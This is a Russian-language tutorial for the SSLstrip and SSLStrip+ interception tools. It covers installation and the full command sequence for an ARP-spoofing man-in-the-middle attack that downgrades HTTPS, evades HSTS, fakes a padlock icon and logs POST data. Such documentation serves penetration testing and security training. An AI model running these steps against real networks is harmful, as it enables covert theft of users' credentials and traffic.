SSLstrip (SSLStrip+)
Доброго времени суток, без лишних слов, сразу к делу.
Описание SSLstrip
sslstrip — это инструмент, который незаметно перехватывает HTTP трафик в сети, следит за HTTPS ссылками и редиректами, а затем сопоставляет эти ссылки их HTTP двойникам или омографически сходным HTTPS ссылкам. Он также поддерживает режимы для подачи иконки сайта (favicon), которая выглядит как иконка замка, выборочное ведение журнала и отклонение сессий.
Официальный сайт- http://www.thoughtcrime.org/software/sslstrip/
Описание SSLStrip+
Это новая версия SSLstrip с новой функцией обхода механизма защиты HTTP Strict Transport Security (HSTS).
Эта версия, как и оригинальная, меняет HTTPS на HTTP плюс имя хоста в html коде для избежания HSTS.
Для того, чтобы она работала, также нужен DNS сервер, который возвращает вспять изменения, сделанные прокси. Таким DNS сервером является dns2proxy.
Страница на GitHub: https://github.com/singe/sslstrip2/
Как работает SSLstrip?
Во-первых, arpspoof убеждает хост, что наш MAC адрес- это MAC адрес роутера, и цель начинает отправлять нам весь сетевой трафик. Ядро перенаправляет всё, кроме трафика предназначенного для порта 80, который перенаправляется в $listenPort (10000, например).
Таким образом sslstrip получает трафик и делает свою магию.
Установка SSLstrip
Программа предустановлена в Kali Linux.
Установка SSLstrip в Linux
Требования:
- Python >= 2.5 (apt-get install python)
- Модуль python "twisted-web" (apt-get install python-twisted-web)
Установка:
tar zxvf sslstrip-0.9.tar.gz cd sslstrip-0.9
(опционально)
sudo python ./setup.py install
Примеры запуска SSLstrip
Записать результаты в файл (-w sslstrip.log), прослушивать на порту 8080 (-l 8080):
sslstrip -w sslstrip.log -l 8080
Запуск sslstrip
Переключите вашу машину в режим пересылки (форвардинга):
echo "1" > /proc/sys/net/ipv4/ip_forward
Настройте iptables для редиректа HTTP трафика на sslstrip:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>
Запустите sslstrip:
sslstrip.py -l <listenPort>
Запустите arpspoof, чтобы убедить сети, что им следует отправлять их трафик вам:
arpspoof -i <interface> -t <targetIP> <gatewayIP>
Справка по SSLstrip
Использование: sslstrip <опции>
Опции:
-w <имя_файла>, --write=<имя_файла> Задаёт файл для лога (опционально). -p , --post Записывать в журнал только SSL POST. (по умолчанию) -s , --ssl Записывать весь SSL трафик к и от сервера. -a , --all Записывать весь SSL и HTTP трафик к и от сервера. -l <порт>, --listen=<порт> Порт для прослушивания (по умолчанию 10000). -f , --favicon Подменить иконку сайта на замок для безопасных запросов. -k , --killsessions Убить текущие сессии. -h Напечатать это сообщение помощи.